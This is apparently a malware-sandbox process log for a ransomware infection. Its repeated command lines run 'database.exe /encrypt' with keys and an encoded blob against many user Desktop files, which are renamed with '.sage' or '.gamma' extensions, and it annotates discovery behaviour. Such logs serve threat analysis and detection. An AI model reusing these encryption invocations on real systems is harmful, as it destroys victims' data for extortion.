C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AddGroup.mp4.sage.gif"5⤵PID:4240
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AssertExpand.css.sage.gif"5⤵PID:1892
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ClearCheckpoint.cr2.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6156
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ClearRestore.mpeg3.sage.gif"5⤵PID:232
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CloseMeasure.ADT.sage.gif"5⤵
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\cmd.exe.lnk.gif"5⤵
- System Location Discovery: System Language Discovery
PID:6240
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CmqL7QFf-57e8zezN.[[email protected]].gif"5⤵PID:7012
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CompleteFormat.mid.sage.gif"5⤵PID:4756
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ConvertFromExport.vssm.gif"5⤵
- System Location Discovery: System Language Discovery
PID:6328
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4260
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisableProtect.cab.sage.gif"5⤵
- System Location Discovery: System Language Discovery
PID:5644
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisconnectWait.bmp.sage.gif"5⤵PID:4820
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ExitGrant.svgz.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2092
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FILES ENCRYPTED.txt"5⤵PID:2400
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FindRepair.vsdm.gif"5⤵PID:1920
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\HideClose.cr2.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1652
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\InitializeAssert.pps.sage.gif"5⤵PID:6520
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\InitializeResolve.mhtml.sage.gif"5⤵PID:3532
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\JoinRestart.nfo.sage.gif"5⤵PID:2464
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ProtectOpen.jpeg.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:3700
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\README_sTlLoTpq.hta.gif"5⤵
- System Location Discovery: System Language Discovery
PID:5508
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ReceiveExpand.avi.sage.gif"5⤵PID:6464
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RemoveSet.mp2v.gif"5⤵PID:2636
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" 